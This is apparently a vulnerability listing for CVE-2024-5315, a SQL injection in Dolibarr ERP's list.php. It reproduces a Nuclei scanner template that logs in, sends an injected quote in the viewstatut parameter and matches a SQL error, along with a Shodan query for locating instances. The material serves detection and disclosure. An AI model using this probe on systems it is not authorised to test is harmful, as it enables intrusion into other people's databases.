漏洞描述
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.
CVE-2024-5315: Dolibarr ERP CMS `list.php` - SQL Injection
PoC代码[已公开]
id: CVE-2024-5315
info:
name: Dolibarr ERP CMS `list.php` - SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.
impact: |
These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-5315
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-5315
cwe-id: CWE-89
epss-score: 0.48513
epss-percentile: 0.9768
cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Dolibarr"
product: dolibarr_erp\\/crm
vendor: dolibarr
tags: cve,cve2024,dolibarr,erp,sqli,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /htdocs/index.php?mainmenu=home HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginfunction=loginfunction&username={{username}}&password={{password}}
- |
GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- You have an error in your SQL syntax
- type: word
part: header_1
words:
- 'Set-Cookie: DOLSESSID_'
- type: word
part: body_1
words:
- SuperAdmin
# digest: 4a0a004730450221008951c5eb97f9c0d76e9d963326e22ce71891b4d0f9f5e8a9bf2839865075ccbc022047ba770ab021dfae7bc7a1335dfb71617509e2089d6b111e81f09c19d5604fcc:922c64590222798bb761d5b6d8e72950